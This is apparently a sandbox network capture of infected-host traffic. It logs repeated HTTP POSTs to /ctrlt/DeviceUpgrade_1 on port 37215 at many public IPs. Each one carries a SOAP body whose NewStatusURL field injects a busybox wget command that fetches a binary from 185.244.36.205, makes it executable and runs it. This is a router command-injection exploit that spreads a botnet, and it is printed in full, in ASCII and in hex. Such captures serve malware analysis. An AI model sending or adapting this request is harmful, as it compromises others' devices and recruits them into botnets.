                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1027192.168.2.1546650190.85.151.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928723097 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1028192.168.2.153623431.35.62.20137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928750038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1029192.168.2.1560828222.159.40.14337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928785086 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1030192.168.2.1539358138.180.63.15737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928792000 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1031192.168.2.155158894.185.230.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928821087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1032192.168.2.1545476138.181.9.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928821087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1033192.168.2.1538296157.198.150.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928828001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1034192.168.2.155940437.219.221.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928853035 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1035192.168.2.1550660157.121.30.13737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928872108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1036192.168.2.1551812222.28.225.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928908110 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1037192.168.2.1560652181.220.67.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.928910017 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
